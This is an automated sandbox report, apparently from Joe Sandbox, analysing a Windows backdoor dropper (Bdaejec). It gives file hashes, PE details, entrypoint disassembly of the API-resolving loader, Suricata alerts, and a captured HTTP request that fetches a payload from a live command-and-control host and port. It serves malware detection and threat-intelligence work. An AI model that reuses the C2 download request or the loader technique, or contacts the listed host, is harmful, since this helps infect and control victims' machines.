SSDEEP:	768:uWQ3655Kv1X/qY1MSdTMQGPL4vzZq2o9W7GsxBbPr:uHqaNrFdTPGCq2iW7z
MD5:	173FE8D04C81E4695725A4990A86C397
SHA1:	A4C179C54E27F1293B6A993C8E97E12D3E22CADC
SHA-256:	46E7C802EEA77E3585BAEFC34B58E71065F14865E0BD27283ED161C5DE2F3B17
SHA-512:	DED9786B808E3D25A847A3CEAB28D613F0383F0879BDA8D2DCFF99111BEC9150F756BEB86643FBDC3BDA58D7A8F8F34173F0C2B8CBF4A3D67C27648C485A150F
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.6...X...X...X.x.R...X..V...X.x.\...X......X...Y.W.X......X.!.R...X...^...X.Rich..X.................PE..L...pN.d........../......V...@.......p.......0....@.........................................................................$9.......`...............................................................................0...............................text............................... ..`.rdata.......0......................@..@.data...X....@.......(..............@....rsrc........`.......*..............@..@.EpN.uZ..P...p...B...:.............. ...................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rbQTKRDg.exe_b2e16567d38d3665bdcdecb9364bfea9b9d478f_a13a3c5e_cb8f4664-8611-4edf-b501-4bc53d663cd6\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.978554483895827
Encrypted:	false
SSDEEP:	96:Q1For9Is65hn677afzQXIDcQZc6dcE1cw36DC+HbHg/5ksS/YyNl1zWDUMsIqLOW:4U9IC0HZPO3j0/hXzuiFJZ24IO85
MD5:	7A96C12D72C03492D4F3A589C7980E2F
SHA1:	05982F647B76FA700797DFF964B85A1407200AD6
SHA-256:	4342822CD962BAF324C16FB714CC2C246D2871E1597A7EC4871C4EED6D4C6125
SHA-512:	CBD83B7368A2128FCACB1F771B5F5CCD5DAA5E66E04B04402F0184B0721C912C184CCB3E1BAC287C8E056ADF8B5B8A26D729749B0F7488E696133C624F75DCD9
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.8.5.8.7.0.4.9.8.1.5.2.3.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.9.8.5.8.7.0.5.4.9.7.1.5.0.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.b.8.f.4.6.6.4.-.8.6.1.1.-.4.e.d.f.-.b.5.0.1.-.4.b.c.5.3.d.6.6.3.c.d.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.c.6.0.d.c.0.b.-.f.0.8.3.-.4.3.3.0.-.b.c.b.d.-.2.8.3.a.a.7.1.a.b.2.c.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.b.Q.T.K.R.D.g...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.5.c.c.-.0.0.0.1.-.0.0.1.5.-.1.f.3.4.-.0.8.2.1.1.b.5.9.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.9.7.8.4.0.f.f.6.1.a.8.2.a.5.7.8.d.0.0.c.7.b.1.5.8.1.2.9.9.9.4.0.0.0.0.f.f.f.f.!.0.0.0.0.9.9.e.e.3.1.c.d.4.b.0.d.6.a.4.b.6.2.7.7.9.d.a.3.6.e.0.e.e.e.c.d.d.8.0.5.8.9.f.c.!.r.b.Q.T.K.R.D.g...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER99D2.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Sat Dec 28 11:25:05 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	150028
Entropy (8bit):	1.9016993861084925
Encrypted:	false
SSDEEP:	768:Ny5J/ptF2MV98QD3cH4y18JDWSKqy8Xliev6TN:IUQ8qY4y8DWSKqy8Xliev6TN
MD5:	F25F36239298DE6D5A9AFA88F1711B68
SHA1:	E1F704E452F3F242740E13FF907A51079032514E
SHA-256:	0B90539554DACCE82156179F0295CDFF209B65722E68B5F9A0E914DE4FED263C
SHA-512:	2F21473FDE3327F2BD9D0541EDA62059EBB65DC5632D9FFB3403F2658A5E2EF3A6420F6480C0B0F4573E53A68AAC7F739D8A8768A385CE8EF16F9FB8B64123C2
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... .........og............D...............X.......<...$ ......4....M..........`.......8...........T............=..l...........` ..........L"..............................................................................eJ......."......GenuineIntel............T.............og.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9AFC.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	6280
Entropy (8bit):	3.724784057292081
Encrypted:	false
SSDEEP:	96:RSIU6o7wVetbWI6B8lYGtqlg5aMQU+89bPJrEsfQ9JTm:R6l7wVeJWI6B8lYGtlpD+89b9EsfQ/m
MD5:	F9342BB58F440C76AC8740B1ED183E77
SHA1:	AFEB8E9D711639076EE1F4D84A5993950A1FA36E
SHA-256:	2E66052D5936CC57FB0241A82D81FC10C614589B94A2A3F35309A55703775BC8
SHA-512:	21D12F5B35303D687DC9F751F659D0065DB2C53F22F9271B29AADD7519207CA0042BE06C63165147D3562A84B8F10AC88D935AC7F055BB41EE04DB9331FCBDCC
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.5.8.0.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9B1C.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4565
Entropy (8bit):	4.462262222448951
Encrypted:	false
SSDEEP:	48:cvIwWl8zs5rJg77aI9VKWpW8VYbYm8M4JcOFH4+q8acW1gSWd:uIjfrI7fr7V/Jt40W1gSWd
MD5:	5A4264EA11AF32D1E9A1136778353807
SHA1:	C0A57E853EB304282AD5336974B5CDCE58AE6B3F
SHA-256:	00257CC765D4437998D1F47265F215A5CC9AD83EAE5F56C18D906D511480F575
SHA-512:	4B3C1074C477100C1F46A3516AD781626B4BFDB2A4819CF866D61071FA8F25730FCEDE49609DD3C92932FE5C0195308B07891E363DCCE93FBC076386DD8DEE94
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="651027" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\k1[1].rar

Download File

Process:	C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Temp\59400905.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe

Download File

Process:	C:\Users\user\Desktop\aRxo3E278B.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	15872
Entropy (8bit):	7.031113762428177
Encrypted:	false
SSDEEP:	384:7XZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:1QGPL4vzZq2o9W7GsxBbPr
MD5:	56B2C3810DBA2E939A8BB9FA36D3CF96
SHA1:	99EE31CD4B0D6A4B62779DA36E0EEECDD80589FC
SHA-256:	4354970CCC7CD6BB16318F132C34F6A1B3D5C2EA7FF53E1C9271905527F2DB07
SHA-512:	27812A9A034D7BD2CA73B337AE9E0B6DC79C38CFD1A2C6AC9D125D3CC8FA563C401A40D22155811D5054E5BAA8CF8C8E7E03925F25FA856A9BA9DEA708D15B4E
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 97%
Joe Sandbox View:	Filename: gT6IitwToH.exe, Detection: malicious, Browse Filename: #U65b0#U7248#U7f51#U5173.exe, Detection: malicious, Browse Filename: #U8865#U4e01#U6253#U5305.exe, Detection: malicious, Browse Filename: #U65b0#U7248#U7f51#U5173Srv.exe, Detection: malicious, Browse Filename: gE4NVCZDRk.exe, Detection: malicious, Browse Filename: ib.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win32.Malware-gen.17468.9520.exe, Detection: malicious, Browse Filename: 8VB4lVuZk3.exe, Detection: malicious, Browse Filename: biKy3nZEyJ.exe, Detection: malicious, Browse Filename: biKy3nZEyJ.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......z.I.>.'.>.'.>.'..7\.2.'...(.?.'.>.&.y.'.Q.#.=.'..).?.'.7...6.'.7...?.'.Rich>.'.................PE..L...JG.R.............................`.......0....@.......................................@..................................p...............................o.......................................................................................text.... ..........................`....rdata.......0......................@....data........@......................@....reloc.......P.......(..............@....aspack.. ...`.......,..............`....adata...............>..............@...................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.4690238645278715
Encrypted:	false
SSDEEP:	6144:AzZfpi6ceLPx9skLmb0fBZWSP3aJG8nAgeiJRMMhA2zX4WABluuNvjDH5Sq:WZHtBZWOKnMM6bFp5j4
MD5:	74E8D4DE375033394F964ADF305BEF8A
SHA1:	BE3A9C29B651426F9640DACB55AD3E332F2B627D
SHA-256:	A13F2CB25D9BA9D0BA73701735902818C864D09726B992FCC27C2690E03BDA49
SHA-512:	3BC3941FEB006C7E0002CAC50CE3DB0DEAE8365DA742B5B35E4FC021A41A7898AA338DEBC54619A240DE7F444358C0A360A26417BC6D2E71098A5B66839BB782
Malicious:	false
Preview:	regfI...I....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmv.c".Y................................................................................................................................................................................................................................................................................................................................................u.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.575804896870382
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	aRxo3E278B.exe
File size:	82'432 bytes
MD5:	93bc13a5ccf808ac29d512748221ce1d
SHA1:	bff2313cab29f6301d4131eb2f211d4b26743a90
SHA256:	65214c3035c0f49f04a69d0c23f90f5b2b0135b706991ce5a9842fc6e4a077ed
SHA512:	342d40e8b5cce907f02123c1eec89bc18233468a7c7bba7c3b180de4a05fdc1996d509545129db8e9207cfa70b8eced8798633f6ce82c75c399a680bb655da37
SSDEEP:	1536:Yg/6/tM8NXDjPX0QWlfGMckTQwZGCq2iW7z:Hk3U8kTQUGCH
TLSH:	88838D61B980C073C44A6079441DC7B19F7FBC3126B5C997BB960BBB5F313D1EA2A24A
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........S...2...2...2.......2...2...2...}8..2...`*..2...`;..2...`-..2...`?..2..Rich.2..........................PE..L......Q...........

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x414000
Entrypoint Section:	wu
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x518BB101 [Thu May 9 14:21:53 2013 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	ba2c974ed567c90fe365844af978f320

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
sub esp, 0000016Ch
xor eax, eax
push ebx
push esi
push edi
mov dword ptr [ebp-24h], eax
mov dword ptr [ebp-10h], eax
mov dword ptr [ebp-14h], eax
mov dword ptr [ebp-08h], eax
mov dword ptr [ebp-0Ch], eax
mov dword ptr [ebp-20h], eax
mov dword ptr [ebp-18h], eax
mov dword ptr [ebp-48h], 54516272h
mov dword ptr [ebp-44h], 6744524Bh
mov dword ptr [ebp-40h], 6578652Eh
mov dword ptr [ebp-3Ch], 00000000h
call 00007F2E1C6A66A5h
pop eax
add eax, 00000225h
mov dword ptr [ebp-04h], eax
mov eax, dword ptr fs:[00000030h]
mov dword ptr [ebp-28h], eax
mov eax, dword ptr [ebp-04h]
mov dword ptr [eax], E904C483h
mov eax, dword ptr [ebp-04h]
mov dword ptr [eax+04h], FFFEE3A2h
mov eax, dword ptr [ebp-28h]
mov eax, dword ptr [eax+0Ch]
mov eax, dword ptr [eax+1Ch]
mov eax, dword ptr [eax]
mov eax, dword ptr [eax+08h]
mov ecx, dword ptr [eax+3Ch]
mov ecx, dword ptr [ecx+eax+78h]
add ecx, eax
mov edi, dword ptr [ecx+1Ch]
mov ebx, dword ptr [ecx+20h]
mov esi, dword ptr [ecx+24h]
mov ecx, dword ptr [ecx+18h]
add esi, eax
add edi, eax
add ebx, eax
xor edx, edx
mov dword ptr [ebp-30h], esi
mov dword ptr [ebp-1Ch], edx
mov dword ptr [ebp-34h], ecx
cmp edx, dword ptr [ebp-34h]
jnc 00007F2E1C6A67EEh
movzx ecx, word ptr [esi+edx*2]
mov edx, dword ptr [ebx+edx*4]
mov esi, dword ptr [edi+ecx*4]
add edx, eax
mov ecx, dword ptr [edx]
add esi, eax
cmp ecx, 4D746547h
jne 00007F2E1C6A66F4h
cmp dword ptr [edx+04h], 6C75646Fh
jne 00007F2E1C6A66EBh

Rich Headers

Programming Language:

[IMP] VS2005 build 50727
[C++] VS2008 build 21022
[ASM] VS2008 build 21022
[ C ] VS2008 build 21022
[LNK] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xf934	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xf488	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xe000	0x140	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xc9ed	0xca00	9c1449c399f02a55d49d67dd9413e89c	False	0.6139193997524752	data	6.618135871473556	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0xe000	0x2068	0x2200	c3c323d1b4244bb08b2144d7f6ccb84f	False	0.349609375	data	5.290951954639895	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x11000	0x2bc4	0x1000	3ecb8d5c354d07019fd9bd96c5e5f3a1	False	0.20947265625	data	2.251287542215587	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
wu	0x14000	0x5000	0x4200	e9a58420079dcf44dda5ea022fb2bb95	False	0.7772845643939394	data	6.935419512952454	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Imports

DLL

Import

KERNEL32.dll

GenerateConsoleCtrlEvent, GetExitCodeProcess, WaitForSingleObject, CreateProcessA, SetConsoleCtrlHandler, GetModuleFileNameA, EnterCriticalSection, LeaveCriticalSection, GetModuleHandleW, Sleep, GetProcAddress, ExitProcess, GetCommandLineA, GetStartupInfoA, SetHandleCount, GetStdHandle, GetFileType, DeleteCriticalSection, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, GetLastError, HeapFree, HeapAlloc, GetCPInfo, InterlockedIncrement, InterlockedDecrement, GetACP, GetOEMCP, IsValidCodePage, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, GetCurrentThreadId, WriteFile, LoadLibraryA, InitializeCriticalSectionAndSpinCount, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, HeapCreate, VirtualFree, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, RtlUnwind, HeapReAlloc, VirtualAlloc, GetConsoleCP, GetConsoleMode, FlushFileBuffers, LCMapStringA, MultiByteToWideChar, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, SetFilePointer, HeapSize, CloseHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, SetStdHandle, CreateFileA, CompareStringA, CompareStringW, SetEnvironmentVariableA, ReadFile, SetEndOfFile, GetProcessHeap, GetFileAttributesA

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-28T12:25:00.452922+0100	2838522	ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup	1	192.168.2.6	52159	1.1.1.1	53	UDP
2024-12-28T12:25:01.831265+0100	2807908	ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin	1	192.168.2.6	49707	44.221.84.105	799	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 28, 2024 12:25:00.602969885 CET	49707	799	192.168.2.6	44.221.84.105
Dec 28, 2024 12:25:00.722551107 CET	799	49707	44.221.84.105	192.168.2.6
Dec 28, 2024 12:25:00.722856998 CET	49707	799	192.168.2.6	44.221.84.105
Dec 28, 2024 12:25:00.723174095 CET	49707	799	192.168.2.6	44.221.84.105
Dec 28, 2024 12:25:00.842649937 CET	799	49707	44.221.84.105	192.168.2.6
Dec 28, 2024 12:25:01.831170082 CET	799	49707	44.221.84.105	192.168.2.6
Dec 28, 2024 12:25:01.831214905 CET	799	49707	44.221.84.105	192.168.2.6
Dec 28, 2024 12:25:01.831264973 CET	49707	799	192.168.2.6	44.221.84.105
Dec 28, 2024 12:25:01.831321955 CET	49707	799	192.168.2.6	44.221.84.105
Dec 28, 2024 12:25:01.835760117 CET	49707	799	192.168.2.6	44.221.84.105
Dec 28, 2024 12:25:01.879734039 CET	799	49707	44.221.84.105	192.168.2.6
Dec 28, 2024 12:25:01.879821062 CET	49707	799	192.168.2.6	44.221.84.105
Dec 28, 2024 12:25:01.955235958 CET	799	49707	44.221.84.105	192.168.2.6
Dec 28, 2024 12:25:05.070470095 CET	49708	799	192.168.2.6	44.221.84.105
Dec 28, 2024 12:25:05.190016985 CET	799	49708	44.221.84.105	192.168.2.6
Dec 28, 2024 12:25:05.190097094 CET	49708	799	192.168.2.6	44.221.84.105
Dec 28, 2024 12:25:06.095213890 CET	799	49708	44.221.84.105	192.168.2.6
Dec 28, 2024 12:25:06.095266104 CET	49708	799	192.168.2.6	44.221.84.105
Dec 28, 2024 12:25:06.095510960 CET	799	49708	44.221.84.105	192.168.2.6
Dec 28, 2024 12:25:06.095567942 CET	49708	799	192.168.2.6	44.221.84.105
Dec 28, 2024 12:25:11.242813110 CET	49708	799	192.168.2.6	44.221.84.105

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 28, 2024 12:25:00.452922106 CET	52159	53	192.168.2.6	1.1.1.1
Dec 28, 2024 12:25:00.590595961 CET	53	52159	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 28, 2024 12:25:00.452922106 CET	192.168.2.6	1.1.1.1	0xfaf7	Standard query (0)	ddos.dnsnb8.net	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 28, 2024 12:25:00.590595961 CET	1.1.1.1	192.168.2.6	0xfaf7	No error (0)	ddos.dnsnb8.net		44.221.84.105	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

ddos.dnsnb8.net:799

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49707	44.221.84.105	799	5580	C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe

Timestamp	Bytes transferred	Direction	Data
Dec 28, 2024 12:25:00.723174095 CET	288	OUT	GET /cj//k1.rar HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: ddos.dnsnb8.net:799 Connection: Keep-Alive

Target ID:	0
Start time:	06:24:59
Start date:	28/12/2024
Path:	C:\Users\user\Desktop\aRxo3E278B.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\aRxo3E278B.exe"
Imagebase:	0x400000
File size:	82'432 bytes
MD5 hash:	93BC13A5CCF808AC29D512748221CE1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	06:24:59
Start date:	28/12/2024
Path:	C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe
Imagebase:	0x8f0000
File size:	15'872 bytes
MD5 hash:	56B2C3810DBA2E939A8BB9FA36D3CF96
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 97%, ReversingLabs
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	06:25:04
Start date:	28/12/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 5580 -s 1384
Imagebase:	0xf30000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	6.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	4%
Total number of Nodes:	2000
Total number of Limit Nodes:	74

Executed Functions

Function 00414044 Relevance: 33.4, APIs: 4, Strings: 15, Instructions: 171
fileprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 00414223
WriteFile.KERNELBASE(00000000,FFFEE3A2,00003E00,?,00000000), ref: 00414252
CloseHandle.KERNELBASE(00000000), ref: 00414256
WinExec.KERNEL32(?,00000005), ref: 00414262

Strings

GetT, xrefs: 00414188
catA, xrefs: 004141AF
odul, xrefs: 0041422D
el32, xrefs: 004140FB
Writ, xrefs: 00414148
lstr, xrefs: 004141A7
athA, xrefs: 00414199
dleA, xrefs: 004140D0
Clos, xrefs: 00414129
Kern, xrefs: 004140F4
Crea, xrefs: 00414169
WinE, xrefs: 00414110
rbQTKRDg.exe, xrefs: 004141FD, 00414200
.dll, xrefs: 00414102
GetM, xrefs: 004140B6

Memory Dump Source

Source File: 00000000.00000002.2098565183.0000000000414000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2098514534.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098525968.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098538614.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098551605.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098577718.0000000000415000.00000080.00000001.01000000.00000003.sdmpDownload File

